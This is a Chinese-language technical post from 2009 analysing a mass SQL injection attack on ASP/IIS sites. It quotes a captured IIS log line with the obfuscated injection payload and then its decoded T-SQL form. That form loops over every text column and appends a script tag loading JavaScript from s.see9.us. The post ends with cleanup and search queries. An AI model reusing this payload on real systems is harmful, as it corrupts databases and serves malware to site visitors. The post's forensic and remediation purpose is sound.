author:perfectaction
date :2009.05
从去开始,有很多网站数据库的表的text、ntext、varchar、nvarchar字段内容末尾被加入"></title><script src=http://s.see9.us/s.js><或是3b3.org等字符
我也遇到过,通过分析iis日志,搜索"Update%20",找到很多,如:
2008-**-** 00:17:54 59.39.69.146 - W3SVC1 80 GET show.asp id=8826;[email protected]%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20select%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20where%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNt[email protected],@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('Update%20[[email protected]%2b']%20sEt%20[[email protected]%2b']=rtrim(convert(varchar,[[email protected]%2b']))%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')[email protected],@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 302 0 HTTP/1.1 211.68.23.76 Mozilla/4.0 - -
这段代码我还原后如下:
- SQL code
declare @t varchar(255),@c varchar(255) declare table_cursor cursor for select a.name,b.name from sysobjects a,syscolumns b where a.iD=b.iD AnD a.xtype='u' AnD (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) open table_cursor fetch next from table_cursor into @t,@c while(@@fetch_status=0) begin print('update [' + @t + '] set [' + @c + ']=rtrim(convert(varchar,[' + @c + '])) + cast(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D aS varchar(67))') fetch next from table_cursor into @t,@c end close table_cursor deallocate table_cursor;实事上,上面的print实际为exec..其原理就是通过遍历所有的表中的字符类型字段,然后update其内容,加上攻击者的字符.
同理,若要去掉这些字符,也可以利用上面的代码:
- SQL code
declare @t varchar(255),@c varchar(255) declare table_cursor cursor for select a.name,b.name from sysobjects a,syscolumns b where a.iD=b.iD AnD a.xtype='u'AnD (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) declare @str varchar(500)--这里是你要替换的字符set @str='"></title><script src=http://s.see9.us/s.js></script><!--'open table_cursor fetch next from table_cursor into @t,@c while(@@fetch_status=0)begin exec('update [' + @t + '] set [' + @c + ']=replace(cast([' + @c + '] as varchar(8000)),[email protected]+''','''')') fetch next from table_cursor into @t,@cendclose table_cursor deallocate table_cursor; 但事实上,攻击者在update数据库字段时,是采用先截取再加他自己字符的方法,所以对于text/ntext类型,如果你原来的字段内的字符>8000的话,已经无法全部还原成最初状态了.
往往我们还需要看下其它数据库有没有同样被攻击,我写了如下代码:
- SQL code
--查某个指定字符出现在哪些表哪些字段:declare @searchstr nvarchar(500)set @searchstr ='3b3.org' --这里是你要查的字符内容declare @t varchar(255),@c varchar(255) create table # (name varchar(256),cols varchar(4000))declare table_cursor cursor forselect a.name,b.name from sysobjects a,syscolumns b ,systypes cwhere a.id=b.id and a.xtype='u' and b.xtype=c.xtypeand c.name in ('char','nchar','varchar','nvarchar','text','next')open table_cursor fetch next from table_cursorinto @t,@cwhile(@@fetch_status=0)begin exec(' set nocount on if exists(select top 1 1 from [' + @t + '] where cast([' + @c + '] as varchar(8000)) like [email protected]+'%'') begin if not exists(select 1 from # where [email protected]+''') insert into # select [email protected]+''',[email protected]+''' else update # set cols=cols+'',[email protected]+''' where [email protected]+''' --select [email protected]+' from [' + @t + '] where [' + @c + '] like [email protected]+'%'' end ') fetch next from table_cursor into @t,@c endclose table_cursor deallocate table_cursor;select name as '表名',cols as '列名' from #drop table #